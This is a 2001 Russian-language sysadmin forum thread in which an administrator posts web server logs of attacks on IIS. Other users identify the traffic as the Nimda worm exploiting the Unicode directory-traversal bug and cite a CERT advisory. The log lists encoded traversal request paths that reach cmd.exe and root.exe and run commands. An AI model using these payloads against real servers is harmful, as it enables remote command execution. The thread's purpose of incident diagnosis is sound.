BugTraq.Ru: форум / sysadmin / IMHO, это тебя так сканируют:)

информационная безопасность
без паники и всерьез

подробно о проекте

Анализ криптографических сетевых...

Модель надежности двухузлового...

Специальные марковские модели надежности...

Microsoft Authenticator прекращает...

Очередное исследование 19 миллиардов...

Оптимизация ввода-вывода как инструмент...

bugtraq.ru / форум / sysadmin

Имя

Пароль

если вы видите этот текст, отключите в настройках форума использование JavaScript


ФОРУМ


	все доски
	FAQ
	IRC
	новые сообщения

	site updates
	guestbook
	beginners
	sysadmin
programming
operating systems
theory
web building
software
hardware
networking
law
hacking
gadgets
job
dnet
humor
miscellaneous
scrap

регистрация

Легенда:

новое сообщение

закрытая нитка

новое сообщение

в закрытой нитке

старое сообщение

Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
Новичкам также крайне полезно ознакомиться с данным документом.

IMHO, это тебя так сканируют:) 19.09.01 09:44 Число просмотров: 954
Автор: йцукенг <jcukeng> Статус: Member

<"чистая" ссылка>

на предмет "Unicode bug"
пока только пытаются выполнить команду dir.
автоматически это делают или вручную, можно понять, посмотрев в логах на время запросов.
удачи,
йцукенг

опять атакуют IIS 18.09.01 23:09
Автор: ayc Статус: Незарегистрированный пользователь

<"чистая" ссылка>

Сегодня на нескольких наших сайтах (не связанных) половина запросов - попытки взлома и заражения IIS. В инете уже полно зараженных сайтов, показывающих readme.eml и ругаень в адрес правительства США. Что это за вирус? (непохоже чтобы вручную ломали)

reqs: file
----: ----
49: /scripts/..%255c../winnt/system32/cmd.exe
49: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
44: /scripts/..%5c../winnt/system32/cmd.exe
44: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
34: /scripts/root.exe
34: /scripts/root.exe?/c+dir
31: /msadc/root.exe
31: /msadc/root.exe?/c+dir
27: /d/winnt/system32/cmd.exe
27: /d/winnt/system32/cmd.exe?/c+dir
27: /c/winnt/system32/cmd.exe
27: /c/winnt/system32/cmd.exe?/c+dir
23: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
23: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
23: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
23: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
22: /scripts/winnt/system32/cmd.exe
22: /scripts/winnt/system32/cmd.exe?/c+dir
22: /scripts/..%c1%9c../winnt/system32/cmd.exe
22: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
22: /scripts/..%252f../winnt/system32/cmd.exe
22: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
22: /scripts/..%c0%af../winnt/system32/cmd.exe
22: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
22: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
22: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
22: /scripts/..%c1%1c../winnt/system32/cmd.exe
22: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

Apache то же атакуют ..... как IIS ;-) 20.09.01 16:53
Автор: Falcon Статус: Незарегистрированный пользователь

<"чистая" ссылка>

CERT Advisory CA-2001-26 Nimda Worm 19.09.01 11:29
Автор: ayc Статус: Незарегистрированный пользователь

<"чистая" ссылка>

Это новый вирус, массивно атакующий известные дырки софта MS.

http://www.cert.org/advisories/CA-2001-26.html

IMHO, это тебя так сканируют:) 19.09.01 09:44
Автор: йцукенг <jcukeng> Статус: Member

<"чистая" ссылка>

IMHO, это тебя так сканируют:) 19.09.01 11:31
Автор: ayc Статус: Незарегистрированный пользователь

<"чистая" ссылка>

> на предмет "Unicode bug"
> пока только пытаются выполнить команду dir.
> автоматически это делают или вручную, можно понять,
> посмотрев в логах на время запросов.
> удачи,
> йцукенг

Это все-таки проделки нового сетевого вируса.
http://www.cert.org/advisories/CA-2001-26.html
Думаю, и в своих логах вы тоже уже это обнаружите.

Page build time: 0 s

Design: Vadim Derkach